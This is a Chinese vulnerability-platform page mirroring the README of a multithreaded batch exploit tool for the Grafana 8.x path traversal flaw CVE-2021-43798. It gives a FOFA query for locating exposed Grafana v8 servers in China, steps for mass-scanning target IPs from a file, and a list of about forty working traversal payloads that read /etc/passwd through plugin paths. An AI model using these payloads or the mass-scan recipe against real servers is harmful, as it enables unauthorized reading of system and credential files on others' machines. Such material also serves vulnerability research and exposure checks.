漏洞平台

POC详情： d8f06f26f667cda5c77df7d9eaa245ecb113841c

来源

https://github.com/faaaany/Grafana-CVE-2021-43798Exp

关联漏洞

标题： Grafana 路径遍历漏洞 (CVE-2021-43798)
描述：Grafana是Grafana实验室的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 Grafana 8.0.0-beta1至8.3.0存在路径遍历漏洞，攻击者可利用该漏洞执行目录遍历攻击，访问本地文件。

描述

CVE-2021-43798Exp多线程批量验证脚本

介绍


####  Grafana V8.*任意文件读取Exp--多线程批量验证脚本
### 漏洞描述
Grafana是一个开源的度量分析与可视化套件。经常被用作基础设施的时间序列数据和应用程序分析的可视化，它在其他领域也被广泛的使用包括工业传感器、家庭自动化、天气和过程控制等。其 8.*版本任意文件读取漏洞，该漏洞目前为0day漏洞，未授权的攻击者利用该漏洞，能够获取服务器敏感文件。

### FOFA语法
app="Grafana" && country="CN" && body="v8."

### 使用方法
```
1.将准备检测的IP地址放入ip.txt文件中
2.运行python3 Grafana-CVE-2021-43798Exp
```

![1](https://raw.githubusercontent.com/fanygit/Grafana-CVE-2021-43798Exp/main/2021-12-09_193217.png)

### PAYLOAD
```
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stackdriver/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd
```
![2](https://github.com/fanygit/Grafana-CVE-2021-43798Exp/blob/main/2021-12-09_193646.png?raw=true)

文件快照


 [4.0K]  /data/pocs/d8f06f26f667cda5c77df7d9eaa245ecb113841c
├── [141K]  2021-12-09_193217.png
├── [201K]  2021-12-09_193646.png
├── [7.3K]  Grafana-CVE-2021-43798.py
├── [ 411]  ip.txt
└── [3.2K]  README.md

0 directories, 5 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。